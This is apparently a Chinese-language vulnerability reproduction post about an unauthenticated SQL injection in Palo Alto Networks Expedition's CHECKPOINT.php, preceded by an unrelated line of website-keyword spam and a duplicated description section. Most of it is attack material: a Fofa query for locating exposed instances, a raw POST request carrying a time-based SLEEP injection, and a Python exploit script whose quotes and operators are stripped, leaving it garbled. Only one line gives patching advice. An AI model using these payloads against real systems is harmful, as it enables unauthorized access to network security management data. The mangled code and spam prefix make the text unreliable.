企业网站那几点重要,外贸推广网站邮箱收费,福建工程建设中心网站,怎么做wordpress主题0x01 产品介绍#xff1a; Palo Alto Networks Expedition 是一款强大的工具#xff0c;帮助用户有效地迁移和优化网络安全策略#xff0c;提升安全管理的效率和效果。它的自动化功能、策略分析和可视化报告使其在网络安全领域中成为一个重要的解决方案。
0x02 漏洞描述 Palo Alto Networks Expedition 是一款强大的工具帮助用户有效地迁移和优化网络安全策略提升安全管理的效率和效果。它的自动化功能、策略分析和可视化报告使其在网络安全领域中成为一个重要的解决方案。
0x02 漏洞描述 该漏洞由于CHECKPOINT.php文件存在未授权访问。在sql校验逻辑中存在actionimport当解析控制参数时会创建变量routename和id并且以字符串格式构造查询。导致了漏洞的产生
0x03 影响版本
Palo Alto Networks Expedition 1.2.96 0x04 搜索语句
Fofa:titleExpedition Project 0x05 漏洞复现
poc
POST /bin/configurations/parsers/Checkpoint/CHECKPOINT.php HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencodedactionimporttypetestprojectpandbRBACsignatureid1%20AND%20(SELECT%201234%20FROM%20(SELECT(SLEEP(5)))test) 检测脚本
脚本作者https://github.com/horizon3ai/CVE-2024-9465
#!/usr/bin/python3
import argparse
import requests
import urllib3
import sys
import time
urllib3.disable_warnings()def create_checkpoint_table(url: str):print(f[*] Creating Checkpoint database table...)data {action: get,type: existing_ruleBases,project: pandbRBAC,}r requests.post(f{url}/bin/configurations/parsers/Checkpoint/CHECKPOINT.php, datadata, verifyFalse, timeout30)if r.status_code 200 and ruleBasesNames in r.text:print(f[*] Successfully created the database table)returnprint(f[-] Unexpected response creating table: {r.status_code}:{r.text})sys.exit(1)def inject_checkpoint_query(url: str):start_time time.time()print(f[*] Injecting 10 second sleep payload into database query...)data {action: import,type: test,project: pandbRBAC,signatureid: 1 AND (SELECT 1234 FROM (SELECT(SLEEP(10)))horizon3),}r requests.post(f{url}/bin/configurations/parsers/Checkpoint/CHECKPOINT.php, datadata, verifyFalse, timeout30)execution_time time.time() - start_timeif r.status_code 200 and execution_time 9 and execution_time 15:print(f[*] Successfully sent injection payload!)print(f[] Target is vulnerable, request took {execution_time} seconds)returnprint(f[-] Unexpected response sending injection payload: {r.status_code}:{r.text})sys.exit(1)if __name__ __main__:parser argparse.ArgumentParser()parser.add_argument(-u, --url, helpThe URL of the target, typestr, requiredTrue)args parser.parse_args()create_checkpoint_table(args.url)inject_checkpoint_query(args.url)0x06 修复建议
厂商已发布补丁 请即时升级
Expedition | Palo Alto Networks
